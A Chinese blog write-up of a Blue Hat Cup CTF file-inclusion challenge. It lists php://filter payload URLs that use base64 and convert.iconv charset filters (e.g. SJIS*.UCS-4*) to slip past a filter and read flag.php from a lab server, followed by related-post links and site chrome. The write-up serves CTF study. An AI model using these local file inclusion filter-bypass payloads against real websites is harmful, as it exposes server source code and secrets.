第四届蓝帽杯文件包含题writeup

最新推荐文章于 2023-07-22 14:06:09 发布
最新推荐文章于 2023-07-22 14:06:09 发布
阅读量356 收藏
点赞数
文章标签: php 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/lms29355/article/details/126512978
版权

  1. 访问页面,查看源码

这里我们可以看出可以结合php://filter结合文件包含来读取文件

 

  1. 使用base64读取
http://ip:port/index.php?filename=php://filter/read=convert.base64-encode/resource=/flag

 

  1. 使用 String Filters

得到同样的 do not hack!的结果

  1. 使用 Conversion Filters

尝试使用以下过滤器,都不行

  • convert.base64
  • convert.quoted

使用 convert.iconv.[]过滤器,[]中支持以下字符编码(* 表示该编码也可以在正则表达式中使用)

UCS-4*
UCS-4BE
UCS-4LE*
UCS-2
UCS-2BE
UCS-2LE
UTF-32*
UTF-32BE*
UTF-32LE*
UTF-16*
UTF-16BE*
UTF-16LE*
UTF-7
UTF7-IMAP
UTF-8*
ASCII*
EUC-JP*
SJIS*
eucJP-win*
SJIS-win*
...
\\具体支持的编码可见php官方文档
\\https://www.php.net/manual/zh/mbstring.supported-encodings.php

分别进行尝试

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4*/resource=/var/www/html/flag.php

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4BE/resource=/var/www/html/flag.php

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.UCS-4LE*/resource=/var/www/html/flag.php

…(依次尝试)

最后可以发现,UCS-4*是没有报出错误信息的

那么结合其他编码方式即可读出flag.php文件

payload:
http://127.0.0.1:32771/index.php?filename=php://filter//convert.iconv.SJIS*.UCS-4*/resource=/var/www/html/flag.php

http://192.168.36.132:49153/?filename=php://filter//convert.iconv.UTF-7.UCS-4*/resource=/var/www/html/flag.php

http://192.168.36.132:49153/?filename=php://filter//convert.iconv.EUC-JP*.UCS-4*/resource=/var/www/html/flag.php

sqlnono
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
bugku-writeup-web-文件包含
dark的博客
06-14 1万+
“bugku-web13解思路记录。” 目:click me? no
第四届红帽杯网络安全大赛-线上赛Writeup1
08-03
第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛 - 线上赛 Writeup 第四届红帽杯络安全赛-线上赛Writeup 第四届红帽杯络安全赛-
第四届蓝帽杯”全国大学生网络安全 技能大赛 Writeup
algae
08-08 5499
第四届蓝帽杯”全国大学生网络安全 技能大赛 WriteupMisc签到sudo熟悉的解密Web文件包含绕过easiestSQLiSoitgoesInclusionCryptozuc Misc 签到 观色 010editor查看,发现文件头是GIF89a,是gif文件 Stegsolve 调色道,出现前半flag ps打开,分离两个图层 Stegsolve分析,得到后半flag,即可得到完整flag sudo 喜欢玩数独吗,一起来玩吧。 nc 47.93.204.245 12000 1-9数字玩99
Bugku–flag在index里(本地文件包含writeup
xuchen16的博客
09-19 2479
flag在index里 80 http://120.24.86.145:8005/post/   解思路: 首先打开这道,页面只给你click me? no 点击进去显示test5     第一步,查看源代码,无果 第二步bp,无果 结合到目,flag在index里,大胆尝试http://120.24.86.145:8005/post/index.php,可惜和之前一样...
[蓝帽杯2020第四届 线上赛]文件包含绕过
qq_43801002的博客
08-08 892
目 过程 ######阴间做 纯脑洞,就看谁能搜的到。 1.文件包含php伪协议 2.需要读php文件,以前觉得:后端语言没法直接显示到前端,必须用base64转码 是我浅薄了 Example #3 convert.iconv.* <?php $fp = fopen('php://output', 'w'); stream_filter_append($fp, 'convert.iconv.utf-16le.utf-8'); fwrite($fp, "This is a test.n");
2022蓝帽杯初赛
cppuHsir的博客
07-22 438
2022蓝帽杯初赛
2020 蓝帽杯线下赛PWN WriteUp .pdf
09-05
本文主要涉及的是网络安全领域的Pwn(利用漏洞攻防)技术,具体是针对2020年蓝帽杯线下赛中的一个Pwn目进行的WriteUp(解报告)。Pwn类目通常涉及到缓冲区溢出、格式字符串漏洞、整数溢出等,目标是通过编写...
蓝帽杯one_Pointer_php writeup
05-10
蓝帽杯one_Pointer_php writeup
中国民航大学第四届“西普杯”信息安全竞赛-目源程序和Writeup.zip
10-23
中国民航大学第四届“西普杯”信息安全竞赛-目源程序和Writeup.zip
中国民航大学第四届“西普杯”信息安全竞赛 - 目源程序和Writeup.zip
最新发布
01-14
大学生参加学科竞赛有着诸多好处,不仅有助于个人综合素质的提升,还能为未来职业发展奠定良好基础。以下是一些分析: 首先,学科竞赛是提高专业知识和技能水平的有效途径。通过参与竞赛,学生不仅能够深入学习相关...
2022-第六届”蓝帽杯“全国大学生网络安全技能大赛 wp(WriteUp)
一位热爱网安的年轻人的博客
07-10 883
第六届”蓝帽杯“全国大学生网络安全技能大赛 wp
CTF-MISC取证专项练习(更新ing)
qq_52820087的博客
10-13 2455
CTF-MISC取证专项练习
2021蓝帽杯决赛wp
onl_llo的博客
08-30 1235
2021蓝帽杯决赛wp pwn secretcode 程序分析 只允许open和read read的fd >= 0x14 shellcode的限制: 不能有00, 会被strcpy截断 调⽤shellcode时, rax r10执⾏shellcode 思路: 侧信道泄露flag 先多次open让flag对应的fd为0x14 然后read读⼊⽂件内容到rsp处 爆破[rsp+idx]处的字符, 如果为C, 则死循环, 否则就触发⼀个SIGV 细节: 构造"flag": mov eax, "fl
2022第六届蓝帽杯部分
m0_63525319的博客
10-24 371
主要讲述了本团队做出来的目,如果有错误,大家多多指教
蓝帽杯2022年半决赛 writeup(附取证目+解压密码+附件)
mumuzi的博客
08-05 8513
CTF one_Pointer_php 2021 蓝帽杯 WriteUp
baynk的博客
05-10 1214
两周前做的,弄了一会没时间就放下了,我当时以为我差一点,结果真的差亿点。。。 今天在BUUCTF中看到了这个的复现,特来学习一波。 0x01 PHP审计 之前看到人家发的是张火炬,这次打开却是个广告了。。不过无所谓,给了源代码就成,分别是user.php和add_api.php。 ### user.php <?php class User{ public $count; } ?> ### add_api.php <?php include "user.php"; if($use
绕过disable_functions
unexpectedthing的博客
04-28 2275
文章目录前言黑名单绕过利用 LD_PRELOAD 环境变量LD_PRELOAD 简介利用条件劫持 getuid()劫持启动进程演示过程利用ShellShock(CVE-2014-6271)使用条件:原理简述演示过程php-json-bypass使用条件:原理简述利用脚本演示过程php-GC-bypass使用条件:原理简述利用脚本演示过程利用 Backtrace使用条件:原理简述利用脚本利用方法利用 Apache Mod CGI使用条件:原理简述演示过程2020De1CTF通过攻击 PHP-FPM理论:ctf
第四届全国网络空间安全技术大赛部分 Writeup
柠檬木有枝
10-21 1459
Web1 首先是一个登录注册界面,注册登录进去后提示 flag 在 flag.php。 访问 flag.php 提示 admin can get the flag 发现一个修改密码的页面 change_passwd.php ,根据 cookie 中的 user 确定修改密码的用户,造成任意密码修改漏洞(大佬们还写了脚本更改 admin的密码,这道还是一个拼手速的游戏
蓝帽杯2021初赛 writeup+赛后复现(misc123+pwn2+web1)
mumuzi的博客
04-30 5161
蓝帽越来越离谱 争分夺秒,101分排到前70 Ball_sigin + slient + 冬奥会_is_coming + 复现I_will_but_not_quite + 嫌疑人x的硬盘整理(未完全复现) 1.web:Ball_sigin 纯玩游戏,会出现3个单词缺一个字母,分别吃到对应字母即可出flag 2.PWN:slient 既然是原,就可以直接算杂项了吧(雾 直接参考这个:https://www.lintstar.top/2020/12/784edd2e的slient,改掉端口和ip即可,fla
蓝帽杯全国大学生网络安全技能大赛
08-24
- *1* *3* [[ CTF ]【天格】战队WriteUp-第六届”蓝帽杯“全国大学生网络安全技能大赛(半决赛)](https://blog.csdn.net/ZXW_NUDT/article/details/126173643)[target="_blank" data-report-click={"spm":"1018....

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值